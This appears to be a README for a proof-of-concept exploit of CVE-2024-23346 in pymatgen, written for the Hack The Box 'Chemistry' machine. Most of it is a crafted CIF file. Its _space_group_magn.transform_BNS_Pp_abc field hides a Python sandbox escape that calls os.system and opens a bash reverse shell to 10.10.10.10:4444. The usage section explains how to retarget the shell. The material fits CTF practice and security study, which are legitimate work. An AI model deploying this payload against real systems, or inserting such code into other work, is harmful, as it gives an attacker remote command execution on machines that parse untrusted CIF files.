# 🚀 CVE-2024-23346 (Chemistry - HTB)

This repository contains a Crystallographic Information File (CIF) intended for use on the "Chemistry" machine on Hack The Box (HTB).

## CIF File Example

```text
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1\'");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
```

## Usage
A system command is embedded in the ```_space_group_magn.transform_BNS_Pp_abc``` field. Modify the the ```system("/bin/bash -c 'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1'")``` portion to suit your specific network or system requirements.

## Sources
- [thecybersecguru.com Chemistry Beginner's Guide](https://thecybersecguru.com/ctf-walkthroughs/mastering-chemistry-beginners-guide-from-hackthebox/) 
- [ethicalhacking](https://ethicalhacking.uk/cve-2024-23346-arbitrary-code-execution-in-pymatgen-via-insecure/#gsc.tab=0)
- [github - pymatgen](https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f)

---

⚠️ Disclaimer
This repository is for educational purposes only. Unauthorized access to systems is illegal. Use this knowledge responsibly.
